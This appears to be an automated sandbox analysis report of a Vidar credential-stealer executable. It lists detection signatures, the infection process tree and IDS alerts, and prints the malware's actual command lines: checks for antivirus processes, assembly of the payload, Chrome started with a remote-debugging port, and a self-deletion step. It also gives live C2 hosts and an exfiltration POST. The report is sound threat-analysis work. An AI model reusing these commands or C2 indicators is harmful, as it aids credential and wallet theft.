Windows Analysis Report
GoldenContinent.exe

Overview

General Information

Sample name: GoldenContinent.exe
Analysis ID: 1579534
MD5: 7bc8c8c16081e8d9cebcce0d93bc5f8d
SHA1: 948d3349e7fc284fe648098d85ba7341258847f3
SHA256: f144e645673a830c564b7d50b6b1660767a488059874b2a60a47b8d098bcfc78
Tags: exe, vidar, user-TannerFilip
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • GoldenContinent.exe (PID: 7304 cmdline: "C:\Users\user\Desktop\GoldenContinent.exe" MD5: 7BC8C8C16081E8D9CEBCCE0D93BC5F8D)
    • cmd.exe (PID: 7348 cmdline: "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7432 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7440 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7476 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7484 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7528 cmdline: cmd /c md 523266 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7544 cmdline: findstr /V "landing" Ca MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7560 cmdline: cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Relationship.com (PID: 7576 cmdline: Relationship.com x MD5: 62D09F076E6E0240548C2F837536A46A)
        • chrome.exe (PID: 8008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 1312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2344,i,12562058897419694895,3034342051900266821,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • cmd.exe (PID: 6980 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 1888 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • choice.exe (PID: 7596 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup
{"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |

Source | Rule | Description | Author | Strings
10.2.Relationship.com.43f0000.1.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security |
                Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: Relationship.com x, ParentImage: C:\Users\user\AppData\Local\Temp\523266\Relationship.com, ParentProcessId: 7576, ParentProcessName: Relationship.com, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8008, ProcessName: chrome.exe

                HIPS / PFW / Operating System Protection Evasion

                Source: Process started | Author: Joe Security | Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7484, ProcessName: findstr.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-22T22:47:41.987210+0100 | 2044247 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.4 | 49742 | TCP
                2024-12-22T22:47:44.275191+0100 | 2051831 | 1 | Malware Command and Control Activity Detected | 94.130.188.57 | 443 | 192.168.2.4 | 49743 | TCP
                2024-12-22T22:47:41.986571+0100 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 94.130.188.57 | 443 | TCP
                2024-12-22T22:47:37.428543+0100 | 2859378 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 94.130.188.57 | 443 | TCP

                AV Detection

                Source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}
                Source: GoldenContinent.exe | Virustotal: Detection: 12%
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.4% probability
                Source: GoldenContinent.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: GoldenContinent.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\GoldenContinent.exe | Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
                Source: C:\Users\user\Desktop\GoldenContinent.exe | Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C5DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5DC54
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C6A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A087
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C6A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00C6A1E2
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C5E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,10_2_00C5E472
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C6A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,10_2_00C6A570
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C666DC FindFirstFileW,FindNextFileW,FindClose,10_2_00C666DC
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C2C622 FindFirstFileExW,10_2_00C2C622
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C673D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,10_2_00C673D4
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C67333 FindFirstFileW,FindClose,10_2_00C67333
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C5D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00C5D921
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\523266\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\523266
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
                Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
                Source: chrome.exe | Memory has grown: Private usage: 13MB later: 42MB

                Networking

                Source: Network traffic | Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49740 -> 94.130.188.57:443
                Source: Network traffic | Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49742 -> 94.130.188.57:443
                Source: Network traffic | Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.4:49742
                Source: Network traffic | Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.4:49743
                Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199809363512
                Source: global traffic | HTTP traffic detected:
                    GET /k04ael HTTP/1.1
                    Host: t.me
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 239.255.255.250
                Source: Joe Sandbox View | IP Address: 149.154.167.99
                Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknown | TCP traffic detected without corresponding DNS query: 2.20.68.201
                Source: unknown | TCP traffic detected without corresponding DNS query: 104.18.20.226
                Source: unknown | TCP traffic detected without corresponding DNS query: 2.20.68.210
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\AppData\Local\Temp\523266\Relationship.com | Code function: 10_2_00C6D889 InternetReadFile,SetEvent,GetLastError,SetEvent,10_2_00C6D889
                Source: global traffic | HTTP traffic detected:
                    GET / HTTP/1.1
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: toptek.sbs
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected:
                    GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                    Host: www.google.com
                    Connection: keep-alive
                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: empty
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                Source: global traffic | HTTP traffic detected:
                    GET /async/ddljson?async=ntp:2 HTTP/1.1
                    Host: www.google.com
                    Connection: keep-alive
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: empty
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                Source: global traffic | HTTP traffic detected:
                    GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                    Host: www.google.com
                    Connection: keep-alive
                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: empty
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                Source: global traffic | HTTP traffic detected:
                    GET /async/newtab_promos HTTP/1.1
                    Host: www.google.com
                    Connection: keep-alive
                    Sec-Fetch-Site: cross-site
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: empty
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                Source: global traffic | DNS traffic detected: DNS query: ezaZTimpWHt.ezaZTimpWHt
                Source: global traffic | DNS traffic detected: DNS query: t.me
                Source: global traffic | DNS traffic detected: DNS query: toptek.sbs
                Source: global traffic | DNS traffic detected: DNS query: www.google.com
                Source: unknown | HTTP traffic detected:
                    POST / HTTP/1.1
                    Content-Type: multipart/form-data; boundary=----CTJEC2VAAAAIE3W47YMG
                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                    Host: toptek.sbs
                    Content-Length: 256
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 0000000F.00000003.2170792416.0000781002590000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170819648.0000781002A60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2170413566.0000781002590000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
